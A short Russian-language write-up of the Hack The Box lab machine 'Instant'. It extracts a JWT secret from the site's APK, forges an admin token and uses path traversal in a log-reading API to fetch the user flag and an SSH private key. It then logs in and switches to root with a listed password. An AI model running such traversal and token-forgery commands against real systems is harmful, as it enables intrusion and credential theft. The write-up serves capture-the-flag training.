Instant HTB Writeup
Ссылка на тачку HTB:
https://app.hackthebox.com/machines/Instant
Recon Ссылка на заголовок
sudo echo "10.10.11.37 instant.htb" | sudo tee -a /etc/hosts
Заходим на сайт
При нажатии на кнопку “DOWNLOAD NOW” скачивается apk file
wget http://instant.htb/downloads/instant.apk
Получаем JWT-токен из apk-файла. Секретный ключ jwt -VeryStrongS3cretKeyY0uC4NTGET
Quick Solve Ссылка на заголовок
sudo echo "10.10.11.37 swagger-ui.instant.htb" | sudo tee -a /etc/hosts
User flag Ссылка на заголовок
curl -X GET "http://swagger-ui.instant.htb/api/v1/admin/read/log?log_file_name=..%2Fuser.txt" -H "accept: application/json" -H "Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA"
Root flag Ссылка на заголовок
Лутаем приватный ключ RSA
curl -X GET "http://swagger-ui.instant.htb/api/v1/admin/read/log?log_file_name=..%2F.ssh%2Fid_rsa" -H "accept: application/json" -H "Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA"
Копируем приватный ключ в id_rsa
nano id_rsa
chmod 600 id_rsa
ssh -i id_rsa [email protected]
su root
root password - 12**24nzC!r0c%q12
cat /root/root.txt